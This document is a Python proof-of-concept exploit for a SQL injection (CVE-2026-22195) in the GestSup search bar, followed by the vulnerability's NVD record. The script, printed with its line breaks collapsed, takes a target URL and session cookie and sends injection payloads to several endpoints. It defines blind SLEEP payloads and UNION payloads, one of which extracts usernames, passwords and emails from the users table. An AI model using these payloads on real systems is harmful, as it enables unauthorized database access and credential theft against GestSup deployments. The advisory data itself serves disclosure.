CVE-2026-22195

import requests import sys # CVE-2026-22195 GestSup SQL Injection PoC # Target: GestSup < 3.2.60 # Authentication required (low privilege user) def exploit_sql_injection(target_url, session_cookie): """ SQL Injection PoC for CVE-2026-22195 This demonstrates the vulnerability in search bar functionality """ headers = { 'Cookie': f'PHPSESSID={session_cookie}', 'Content-Type': 'application/x-www-form-urlencoded' } # Basic injection test - using time-based blind SQL injection # The search parameter is vulnerable to SQL injection # Test payload 1: Basic injection check payload_normal = "test'" # Test payload 2: Time-based blind SQLi (MySQL) payload_blind = "test' AND (SELECT 1 FROM (SELECT SLEEP(5))x) AND '1'='1" # Test payload 3: UNION-based injection to extract database version payload_union = "test' UNION SELECT NULL,NULL,@@version,NULL,NULL-- " # Test payload 4: Extract user credentials from database payload_extract = "test' UNION SELECT NULL,username,password,email,NULL FROM users-- " endpoints = [ '/search.php', '/index.php?page=search', '/ajax/search.php' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {url}") # Test normal input first data = {'search': payload_normal} try: resp = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Normal request sent, status: {resp.status_code}") except Exception as e: print(f"[-] Error: {e}") continue # Test blind SQL injection print(f"[*] Testing blind SQL injection...") data = {'search': payload_blind} try: resp = requests.post(url, data=data, headers=headers, timeout=15) print(f"[+] Blind SQLi payload sent") except requests.exceptions.Timeout: print("[!] Request timed out - SQL injection likely successful!") except Exception as e: print(f"[-] Error: {e}") return True if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>") print(f"Example: python {sys.argv[0]} http://victim.com/gestsup abc123def456") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] print(f"[*] CVE-2026-22195 GestSup SQL Injection PoC") print(f"[*] Target: {target}") exploit_sql_injection(target, cookie)

{"cve": {"id": "CVE-2026-22195", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:54.903", "lastModified": "2026-01-14T19:37:21.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions prior to 3.2.60 contain a SQL injection vulnerability in the search bar functionality. User-controlled search input is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges."}, {"lang": "es", "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen una vulnerabilidad de inyección SQL en la funcionalidad de la barra de búsqueda. La entrada de búsqueda controlada por el usuario se incorpora en las consultas SQL sin neutralización suficiente, permitiendo a un atacante autenticado manipular las consultas de la base de datos. La explotación exitosa puede resultar en acceso no autorizado o modificación de los contenidos de la base de datos, dependiendo de los privilegios de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-sqli-in-search-bar", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}